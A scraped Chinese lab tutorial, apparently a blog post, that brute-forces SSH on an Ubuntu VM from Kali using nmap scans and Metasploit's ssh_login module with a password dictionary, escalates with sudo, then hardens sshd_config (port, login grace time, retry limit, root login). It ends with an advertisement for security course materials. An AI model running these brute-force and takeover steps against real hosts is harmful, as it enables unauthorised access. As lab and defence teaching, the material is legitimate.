2026/6/7 13:13:31
网站建设
项目流程
怎么做网站赚钱的动漫网站,郑州高新发布,各大招聘网站,电商类网站建设需要多少钱文章目录一、实验1.环境2.nmap扫描目标主机3.Kali Linux 进行 SSH 渗透3.Kali Linux 进行 SSH 防御二、问题1.SSH有哪些安全配置2.MSF 退出报错一、实验
1.环境
#xff08;1#xff09;主机
表1 主机
系统版本IP备注Kali Linux2022.4192.168.204.154#xff08;动态1主机表1 主机系统版本IP备注Kali Linux2022.4192.168.204.154动态Ubuntu8.04192.168.204.143Kali(2022.4)的目标主机2查看Kali Linux (2022.4)系统版本cat /etc/os-release3 查看Kali Linux (2022.4)系统IP地址ip addr | grep 154(4)查看Ubuntu 8.04 系统版本及IP地址lsb_release -aip addr2.nmap扫描目标主机1扫描⽬标主机所在⽹段所有存活的主机nmap -sP 192.168.204.0/242扫描⽬标主机所有开放端⼝对应的服务和软件版本22端口已开放nmap -sV 192.168.204.1433.Kali Linux 进行 SSH 渗透1进入MSF 控制台msfconsole(2) 搜索 ssh_login脚本search ssh_login(3) 使⽤编号为 0 的脚本use 0(4) 设置⽬标主机set rhosts 192.168.204.143(4)查看选项show options5设置用户名与密码本set username msfadminset pass_file zidian.txt(6)运⾏脚本run7查看会话sessions8连接会话sessions 1查看用户身份whoami查看路径pwd提升权限sudo -i再次查看用户身份whoami更改密码password root(9)MobaXterm远程连接连接3.Kali Linux 进行 SSH 防御1SSH安全配置端口vim /etc/ssh/sshd_config修改端口2重启/etc/init.d/ssh restart3退出之前的MSF5进入MSF 控制台msfconsole(6) 搜索 ssh_login脚本search ssh_login(6) 使⽤编号为 0 的脚本use 0(7) 设置⽬标主机set rhosts 192.168.204.1438设置用户名与密码本set username msfadminset pass_file zidian.txt(9)运⾏脚本失败run10nmap扫描端口ssh端口为12345nmap -sV 192.168.204.14311查看选项show options(12) 设置目标端口set rport 12345(13)运⾏脚本run14SSH安全配置端口vim /etc/ssh/sshd_config修改登录验证时间15重启/etc/init.d/ssh restart16验证等待1分钟17SSH安全配置容错次数vim /etc/ssh/sshd_config修改容错次数18重启/etc/init.d/ssh restart19容错2次二、问题1.SSH有哪些安全配置1配置Port 12345 //端口 LoginGraceTime 1m //登录验证耗时 PermitRootLogin no //不允许root远程登录 MaxAuthTries 2 //最大容错次数2 AllowUsers msfadmin192.168.204.100 //允许指定用户在指定IP上登录2.MSF 退出报错1报错[*] You have active sessions open, to exit anyway type exit -y2原因分析有session会话正在运行。3解决方法exit -y网络安全学习资源分享:给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。因篇幅有限仅展示部分资料朋友们如果有需要全套《网络安全入门进阶学习资源包》请看下方扫描即可前往获取